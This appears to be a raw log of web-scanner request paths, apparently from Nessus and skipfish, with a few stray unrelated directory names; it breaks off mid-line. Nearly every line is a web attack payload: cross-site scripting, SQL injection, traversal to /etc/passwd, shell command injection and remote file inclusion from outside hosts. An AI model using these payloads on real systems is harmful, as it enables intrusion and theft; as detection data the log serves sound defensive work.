/etc/passwd||\n/6n7aacgg.cfc?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/cgibin/ion-p.exe?page=c:\\winnt\\repair\\sam\n/phpmyadmin/documentation.html?phpmyadmin=\\xff\\xfe<script>alert(203)</script>\n/examples/jsp/num/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/u8yiqilu.jspa?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/cgi_scripts/\n/top.php?stuff=\"ver\\x09>q67284925&rem\\x09\n/cgi-bin/softcart.exe\n/examples/jsp/jsp2/el/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\n/yef5f3d5.cfc?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/javascript/subscribed.exe\n/examples/jsp/sessions/index.php?act=arcade&do=stats&gameid=1'\n/6n7aacgg.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/html;jsessionid=86754c9afd13b6aee2405cbe1ebe545f?org.apache.catalina.filters.csrf_nonce=ac21173d31bfde2090e0c04ac032084e\n/javascript/htpasswd.lst\n/jnv890lt.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/starnet/addons/slideshow_full.php?album_name='457135806\n/en-us/account/lang/lang.php?lang_path=/etc/passwd\\x00\n/en-us/account/showproduct.php?product=1'\n/javasscript/\n/javascript/chrome.exe\n/javascript/document.py\n/mv8wxfy9.php3?<script>document.cookie=\"testrhbc=8184;\"</script>\n/33y9gcqq.aspx?<script>document.cookie=\"testnvxc=4301;\"</script>\n/miz4r5hz.aspx?<script>document.cookie=\"testviqu=1270;\"</script>\n/javascript/news.exe\n/index.php?\"><script>alert(411726083444)</script>\n/scripts/apgafvcxoeeh.sh\n/javascript/zboard.exe\n/hjdzm96v.do?<script>document.cookie=\"testbyqe=7474;\"</script>\n/scripts/normal_html.cgi?file=|id|\n/ot_noscript/\n/ewc3rz1l.x?<script>document.cookie=\"testkgqo=204;\"</script>\n/upgrade/index.php?steporder[]=../../../../../../../../include_inexistent_file.txt\\x00\n/lmw4r201.cfm?<script>document.cookie=\"testwews=8477;\"</script>\n/javascript/jrun.exe\n/cgi.cgi/.passwd\n/vjbrrppi.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/trackdescriptions/\n/manager/htsearch?exclude=`/etc/passwd`\n/interface/login/login_frame.php?site=<!--#exec cmd=\"dir \\\"-->\n/examples/jsp/colors/htsearch?exclude=`/etc/passwd`\n/examples/jsp/jsp2/el/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/main.php?logout=&ping;-w;10000;-n;1;1.2.3.4&rem;\n/33y9gcqq.pl?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/?<script>document.cookie=\"testsqmm=5713;\"</script>\n/nuh3zirz.php?<script>cross_site_scripting.nasl</script>\n/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n/scripts/admin.php?dpt=conf&sub=general\n/pxagj7n7.kspx?<script>cross_site_scripting.nasl</script>\n/jscriptpr2/\n/ywaxntrx.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=uname\\x09>q57528363\\x09#\n/azcrfs8d.idc?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/examples/jsp/cal/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n/main.php?logout=;\n/fnwhrxyd.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>\n/uc3w3bdi.idc?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n<meta http-equiv=set-cookie content=\"testyias=101\">\n/<script>document.cookie=\"testwldz=3506;\"</script>\n/examples/jsp/error/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/../copy of \n/examples/jsp/error/mapserv.exe?map=mapserver_detect.nasl.map\n/auto's/\n/scripts/index.php?libdir=http://xxxxxxxx\n/main.php?stuff=&uname >q88638447 #\n/zqqemp6j.fts?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"&rm q45435148 #\n/vac1l5vm.cfc?<script>cross_site_scripting.nasl</script>\n/cgi-exe/msmmask.exe?mask=/junk334\n/javascript/openejb.exe\n/scripts/tombstone.cfm?profileid=<script>foo</script>\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=ylqi1ed35uhwi6jxf\n/cgi-bin/campas?\\x0acat\\x0a/etc/passwd\\x0a\n/examples/jsp/error/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/vhzmaia2.php3?<script>document.cookie=\"testkogj=3979;\"</script>\n/zuihld5m.cfc?<script>cross_site_scripting.nasl</script>\n/scripts/qop0sa1auif9.sh\n/en-us/fo564rei.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/archive.php?scriptpath=http://192.168.202.96:8080/vir0v3xfc??\n/myscript-notes/\n/en-us/account/forumdisplay.php?fid=21\"><script>x</script>\n/d44uk9h2.do?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/top.php?stuff=\"del q61593836&rem \n/o35zot2r.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/eei78ore.php3?<script>cross_site_scripting.nasl</script>\n/l752x1ry.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=2040844887' and 1=1 and ''<>'vzsvhedu\n/examples/jsp/error/index.php?op=default&date=200607' union select 1,1284682657,1,1,1,1,1,1,1,1--&blogid=1\n/javascript/synced.exe\n/l752x1ry.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/javascript/reqs.exe\n/examples/jsp/colors/main.php?g2_itemid=../../../../../license\\x00\n/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/help.php?q=uname\\x09>q95299561\\x09#\n/zuihld5m.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/save.php?file_save=/etc/passwd\n/examples/jsp/colors/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/examples/jsp/cal/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/mv8wxfy9.html?<script>document.cookie=\"testrhbc=8184;\"</script>\n/6wb70v0b.do?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"|ping\\x0b-w\\x0b10000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/scripts/topic.php?tid='select\n/r3le3om5.kspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/help.php?section='qualiteam_xcart_sql_xss.nasl\n/cgi-915/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/inc/download_center_lite.inc.php?script_root=http://cirt.net/rfiinc.txt?\n/en-us/s7qus4g3.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/9o6g5vkn.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/o35zot2r.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=';rm q22931533 #\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332008331,0x3a,892071098),3,4,5,6,7,8,9,10,11,12,13,14,15,16\n/cgi-bin/.cobalt/message/message.cgi?info=<script>alert('alert');</script>\n/scripts/changelog\n/i686v90l.html?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/7dbjwpw6.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/b5xdqgz2.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/fa8p8lr8.pl?<script>cross_site_scripting.nasl</script>\n/v3axg1p8.aspx?<script>document.cookie=\"testxagh=6987;\"</script>\n/manager/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/javascript/dbase.exe\n/fnwhrxyd.nsf?<script>cross_site_scripting.nasl</script>\n/javascript/document.js\n/examples/jsp/num/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print \"content-type: text/plain\\x0d\\x0a\\x0d\\x0a\";system(id)&action=logout\n/cgi-bin/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n/pxagj7n7.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/axdgpyi2bn6f.cfm\n/d5a5renl.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/k0pxpjgnimox.pl\n/main.php?logout=\"\\x0asleep 11 #\n/linus's_law/\n/main.php?stuff=\"rm;q23861899&rem;\n/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/q703m78q.html?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/jdx255ea.html?<script>document.cookie=\"testziyq=5055;\"</script>\n/scripts/cxvae_g3rjys.asp\n/'.$_server['php_self'].'?'.$_server['query_string'].'&act=img&img=delete\n/ydexw8by.asp?<script>document.cookie=\"testulex=4996;\"</script>\n/phpmyadmin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331923203,1242183873 -- \n/cacti/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/vwmg565s.pl?<script>cross_site_scripting.nasl</script>\n/m4kkjf8l.x?<script>document.cookie=\"testyglc=8988;\"</script>\n/examples/jsp/jsp2/el/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n/en-us/i686v90l.cfm?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/en-us/oie504mr.mscgi?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/examples/jsp/colors/index.php?module=<script>foo</script>\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 327415864--\n/examples/jsp/error/htsearch?exclude=`/etc/passwd`\n/javascript/htpasswd.o\n/help.php?q=\\x0duname\\x09>q32573245\\x09#\n/fnwhrxyd.cgi?<script>cross_site_scripting.nasl</script>\n/hrttz9fj.htm?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/_vti_bin/fpcount.exe\n/xfkun1ku.fts?<script>cross_site_scripting.nasl</script>\n/forum-ra.asp?n=/etc/passwd\\x00\n/inscription_colloque/\n/main.php?logout=\"rm;q16377729&rem;\n/profile.php?author_id='414295592513\n/phpmyadmin//../../../../../../../../windows/win.ini\n/zuihld5m.pl?<script>cross_site_scripting.nasl</script>\n/tuwjta1w.mscgi?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/en-us/account/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/eqskvgtjaq0;'); function v\n/main.php?logout=ping;-w;7000;-n;1;4.3.2.1&rem;\n/phpmyadmin.exe\n/javascript/money.exe\n/using logon scripts figure 41102332792318/\n/examples/jsp/colors/search.pl?form=../../../../../../etc/passwd\\x00\n/examples/jsp/error/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/en-us/h5sc3gxy.jspa?<script>cross_site_scripting.nasl</script>\n/javascript/document.o\n/taskdir.exe/\n/javascript/mp3.exe\n/apavxugx.idc?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/wikka.php?wakka=homepage/../../actions/wikkachanges\n/help.php?q=\"ver >q63986192&rem \n/ewc3rz1l.aspx?<script>document.cookie=\"testkgqo=204;\"</script>\n/prescriptionforchange/\n/0qhcnefz.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/javascript/travel.exe\n/javascript/ganglia.exe\n/javascript/.htpasswd.sfish/'\"\n/phpmyadmin/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- \n/javascript/technical.exe\n/javascript/5.exe\n/scripts/core/api.php?t_path_core=/etc/passwd\\x00\n/scripts/index.php?templates_dir=/etc/passwd\\x00\n/examples/jsp/calfaq.php?skin=../../admin/manager&tplpath=admin\n/javascript/technology.exe\n/7dbjwpw6.jspa?<script>cross_site_scripting.nasl</script>\n/newuser?image=../../database/rbsserv.mdb\n/iv5vkgam.kspx?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/webdav/phprun.php?cmd=c:\\wce.exe -w\n/j4rdyhw8.aspx?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/g8nu2yy7.asp?<script>cross_site_scripting.nasl</script>\n/scriptheader/\n/cgi-perl/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/javascript/favorite.exe\n/help.php?q=\"&rm q44114596 #\n/q703m78q.cgi?<script>document.cookie=\"testvowq=604;\"</script>\n/oie504mr.asp?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/scripts/search.jsp?q=%\"<script>alert(1331908793)</script>\n/javascript/q4.exe\n/t578vqea.exe?<meta http-equiv=set-cookie content=\"testsory=7676\">\n//\\..\\..\\..\\..\\..\\..\\..\\..\\etc/passwd\n/phpslideshow.php?directory=x'><script>alert(413966083537)</script><'\n/addyoursite.php?catid=&lt;script&gt;javascript:alert('vulnerable');&lt;/script&gt;\n/gy23xnjq.fts?<script>cross_site_scripting.nasl</script>\n/cgi-bin/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--\n/scripts/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/examples/jsp/sessions/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/javascript/dyn.exe\n/scripts/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/esmozg5d.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/search.jsp?q=%\"<script>alert(1332008324)</script>\n/scripts/lce0cbkfb8xx.inc\n/a?<script>alert('vulnerable')</script>\n/javascript/posts.exe\n/javascript/software.exe\n/the schoolgirl group anal'six - schoolgirl love anal'six!/\n/scripts/index.php?id=urjhxcl19w'\n/cgi-bin/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/ht8pn8uq.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/www/delivery/ac.php?bannerid=-371+or+1=1\n/7dbjwpw6.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/package_descriptions/\n/subscriptions.bin\n/examples/jsp/num/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/cgi-bin/album?mode=album&album=../../../../../../../../etc&dispsize=640&start=0\n/j4drbkil.dll?<script>cross_site_scripting.nasl</script>\n/?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/recordings/shopexd.asp?catalogid='42\n/7uz3ok60.kspx?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/index.php?user_langue=../../../../../../../../../../etc/passwd\n/excelextractscript/\n/javascript/schedule.exe\n/manager/html;jsessionid=17f77181a13462b6efdf6796347078a4?org.apache.catalina.filters.csrf_nonce=57f47e5ed52a4c7e1f345608db2700e9\n/0w155a7c.mscgi?<script>cross_site_scripting.nasl</script>\n/pscripts/\n/cheech & chong's the corsican brothers 1984 dvdrip kvcd jamgood(tus release)/\n/javascript/citrix.exe\n/o35zot2r.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/hwacha_description/\n/main.php?stuff=\"&rm\\x09q91551817\\x09#\n/top.php?stuff=\"\\x0ddel q44371957 #\n/main.php?stuff=\"&uname >q44697755 #\n/javascript/.passwd.old\n/greasemonkeyscriptforsmalltitles/\n/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332010409')</script>\n/cgi-bin/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/0rufe52p.kspx?<script>cross_site_scripting.nasl</script>\n/scripts/wxrdqnkjuwmu.inc\n/examples/jsp/error/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/help.php?q=';uname\\x09>q84185561\\x09#\n/v3axg1p8.pl?<script>document.cookie=\"testxagh=6987;\"</script>\n/y8pmygrp.cgi?<script>cross_site_scripting.nasl</script>\n/ecmascript/\n/statistics-descriptive/\n/tuwjta1w.html?<script>document.cookie=\"testpokn=7494;\"</script>\n/cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat /etc/passwd|\n/javascript/rendered.exe\n/examples/jsp/checkbox/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/h5sc3gxy.kspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/shopexd.asp?catalogid='42\n/en-us/h5sc3gxy.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/iajtej82.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/rbec2ohx.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/9o6g5vkn.fts?<script>cross_site_scripting.nasl</script>\n/pageview postscript v2/\n/examples/jsp/colors/mail.php?id='/**/union/**/select/**/1,2,1331904463,4--&blog=1\n/what's_afoot/\n/<script>alert(\"xss\")</script>/index.html\n/top.php?stuff='\\x0arm q94927894 #\n/vhzmaia2.nsf?<script>document.cookie=\"testkogj=3979;\"</script>\n/cgi-local/.htpasswd\n/javascript/.passwd.svn-base\n/zroo33l4.cfm?<script>document.cookie=\"testiklc=904;\"</script>\n/addvip.php?msetstr[\"progsdir\"]=http://192.168.202.96:8080/ipb5ri?\n/examples/jsp/cal/core/api.php?t_path_core=/etc/passwd\\x00\n/javascript/online.exe\n/xfkun1ku.mscgi?<script>cross_site_scripting.nasl</script>\n/nav/clist.php?root=</script><script>alert('vulnerable')/<script>\n/examples/jsp/num/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n/j734qobz.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/index.php?config[\\\"sipssys\\\"]=@rfiurl\n/index.php?categories=1&cat=xx' union/**/  select '1','412596083481','2','comments' /*\n/en-us/9kr0ih0v.php?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/module/forum/forum.php?fd=http://192.168.202.118:8080/zz5thkvtmlgl?=';\n/6wb70v0b.exe?<script>cross_site_scripting.nasl</script>\n/javascript/employment.exe\n/ju0u7kfo.aspx?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/myevent.php?myevent_path=/etc/passwd\\x00\n/scripts/setup/index.php?gallery_basedir=http://xxxxxxxx/\n/javascript/input.exe\n/edzaia0i.php3?<script>cross_site_scripting.nasl</script>\n/scripts/tomcat_proxy_directory_traversal.nasl1331904670\n/ygkjkngd.jspa?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/snippetmaster/includes/vars.inc.php?_session[script_path]=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/scripts/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/gallean's/\n/en-us/h5sc3gxy.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/2pwudii1mt22.shtml\n/help.php?q='\\x0adel\\x09q61575727\\x09#\n/scripts/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/examples/jsp/sessions/index.php?id='union/**/select/**/0,0,1244365684,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/scripts/t99iadgtkf9h.pl\n/p043snfr.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/uc3w3bdi.jsp?<script>document.cookie=\"testxllt=9940;\"</script>\n/phpmyadmin//\\..\\..\\..\\..\\..\\..\\..\\..\\etc/passwd\n/scripts/count.cgi?align=topcenter\n/en-us/account/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/<script>document.cookie=\"testchuc=2100;\"</script>\n/manager/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/j734qobz.do?<script>cross_site_scripting.nasl</script>\n/main.php?logout='uname\\x09>q24187781\\x09#\n/ny1b3qq4.do?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=ping;-w;9000;-n;1;1.2.3.4&rem;\n/en-us/9kr0ih0v.pl?<script>document.cookie=\"testzgnm=1183;\"</script>\n/javascript/treasury.exe\n/yver8r9o.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/cwmail.exe\n/m5103snj.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.118:8080/iroy1gvqrrqu?\\x00\n/main.php?logout=\"&sleep 11 #\n/quagynka.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/starnet/addons/slideshow_full.php?album_name='60314352\n/x7pclv4s.asp?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/jnv890lt.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"\\x0auname\\x09>q98198938\\x09#\n/javascript/logging.exe\n/help.php?q=';rm\\x09q84185561\\x09#\n/examples/jsp/colors/search.php?searchstring=<script>foo</script>\n/cacti/demos/demo.browse.php?filename=/etc/passwd\n/help.php?q=ver\\x09>q41751651&rem\\x09\n/javascript/remote.exe\n/raanw4ia.cfm?<script>cross_site_scripting.nasl</script>\n/help.php?q=\";rm q19897274 #\n/p043snfr.php?<script>cross_site_scripting.nasl</script>\n/imagebar_prescriptiondrugs/\n/master's_education/\n/main.php?frm_daynight=day&frm_passwd=q39454683&frm_referer=http%3a//192.168.23.202/main.php%3fstuff%3d2040844887&frm_user=&scr_height=&scr_width=\n/help.php?q=&ver\\x09>q84722362&rem\\x09\n/phpwcms_template/inc_script/frontend_render/navigation/config_phplm.php?html_menu_dirpath=http://192.168.202.96:8080/4dckqcc0acprbz?\n/javascript/03.exe\n/7dbjwpw6.cfc?<script>cross_site_scripting.nasl</script>\n/hipscript_020825/\n/examples/jsp/jsp2/jspx/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/javascript/sendmail.exe\n/javascript/06.exe\n/?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/bin/sensepost.exe?/c+dir\n/examples/jsp/jsp2/el/index.php?id='\n/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/vbscript00/\n/editprojectissue.do?projectissueid=\"><script>alert(414225590327)</script><\"\n/iv5vkgam.aspx?<script>document.cookie=\"testfosd=94;\"</script>\n/scripts/qcvjnagy16kc.cfm\n/main.php?logout='\\x0drm q42494852 #\n/manager/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/.\"./.\"./winnt/win.ini .pl\n/clusterframe.jsp?cluster=<script>alert(document.cookie)</script>\n/help.php?q=\"|ping;-w;8000;-n;1;4.3.2.1|rem;\n/o6ebbirj.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/o1zj4u9v.nsf?<script>document.cookie=\"testabrn=6368;\"</script>\n/examples/jsp/error/viewcvs.cgi/?cvsroot=<script>foo</script>\n/javascript/.svn.exe\n/examples/jsp/sessions/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/yver8r9o.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/dslpwt15.do?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/javascript/accessibility.exe\n/xeklsk.exe/\n/examples/servlets/servlet/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/169okeyj.php?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/zuihld5m.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/t99iadgtkf9h.php\n/en-us/account/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/examples/servlets/servlet/cvslog.cgi?file=<script>window.alert</script>\n/inc/formmail.inc.php?script_root=@rfiurl\n/b5xdqgz2.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/jujgxwav.cfm?<script>document.cookie=\"testknim=9383;\"</script>\n/ddoworrl.asp?<script>document.cookie=\"testvlau=8517;\"</script>\n/main.php?logout=\"&ping;-w;7000;-n;1;1.2.3.4&rem;\n/help.php?q=&ver\\x09>q68551744&rem\\x09\n/fa8p8lr8.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/examples/jsp/jsp2/el/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/scripts/nffhikq061nq.php3\n/phpmyadmin/shopexd.asp?catalogid='42\n/scripts/login.mako\n/main.php?logout=\"ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/scripts/xtextarea.scr.php?globals[pth][spaw]=http://192.168.202.96:8080/4dckqcc0acprbz??\n/examples/jsp/colors/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/6wb70v0b.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||\n/scripts/fgos1sb1c1tr.shtml\n/top.php?stuff=&uname\\x09>q78957581\\x09#\n/cgi-bin/erba/start/<script>alert('vulnerable');</script>\n/examples/jsp/error/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/azcrfs8d.idc?<script>document.cookie=\"testjpdr=9205;\"</script>\n/scripts/index.asp\n/en-us/hipkz026.aspx?<script>document.cookie=\"testyrbs=2855;\"</script>\n/script/param/param.inc.php?path_inc=http://192.168.202.118:8080/ghl9il?\n//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\n/ao22ww7y.mscgi?<script>document.cookie=\"testqppc=8767;\"</script>\n/javascript/cgi-pub.exe\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/lhmpvdjfem.sh+>+/dev/null+&').\"]=1\n/javascript/17.exe\n/javascript/.htpasswd.sfish/skipfish://invalid/;?\n/ddoworrl.dll?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/admin/index.php?path_to_script=http://192.168.202.118:8080/ghl9il??&cmd=ls\n<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/examples/jsp/sessions/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/friend.php?op=sitesent&fname=<script>alert('vulnerable')</script>\n/apavxugx.mscgi?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.118:8080/moclyxlwqyfjnp?\\x00\n/examples/jsp/error/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/copying/a=\"%3cscript%20src=%27http://www.example.com/test?rnd=q41226228%27%3e%3c%2fscript%3e\";document.writeln(unescape(a))\n/b1q8bywu.cfc?<script>cross_site_scripting.nasl</script>\n/?<script>document.cookie=\"testlihk=7070;\"</script>\n/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini\n/cgi-bin/dansguardian.pl?deniedurl=</a><script>alert('vulnerable');</script>\n/fa8p8lr8.dll?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/mail.php?id='/**/union/**/select/**/1,2,1331904463,4--&blog=1\n/sgdynamo.exe?htname=<script>foo</script>\n/examples/jsp/num/source?v=../../../../../../../../../../etc/passwd\\x00\n/speedscript_vowels/\n/ghswfouu.htm?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/scripts/2sfdqydfaknx.asp\n/en-us/account/cart32.exe\n/static//..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd\n/javascript/.passwd.rhtml\n/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,1303050841,0,0,0,0,0--\n/zv8tv7h8.cfc?<script>document.cookie=\"testcqwz=9752;\"</script>\n//../../../../../../../../etc/passwd\\x00en\n/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosconfig_absolute_path=http://192.168.202.118:8080/zz5thkvtmlgl?\n/examples/jsp/jsp2/el/sgdynamo.exe?htname=sgdynamo.exe\n/examples/jsp/num/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/d44uk9h2.jsp?<script>document.cookie=\"testmybc=2088;\"</script>\n/script/init/createallimagecache.php?path_to_code=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/javascript/cat.exe\n/y8pmygrp.cfc?<script>cross_site_scripting.nasl</script>\n/raanw4ia.htm?<script>cross_site_scripting.nasl</script>\n/scripts/webdist.cgi?distloc=;id\n/x2gyorli.pl?<script>document.cookie=\"testwhac=3130;\"</script>\n/sophie moon- one of her first hardcore's/\n/examples/jsp/colors/cwmail.exe\n/web-passwd/\n/x2gyorli.jsp?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/uvazfs7p.cfc?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/i2n4v4rl.php?<img 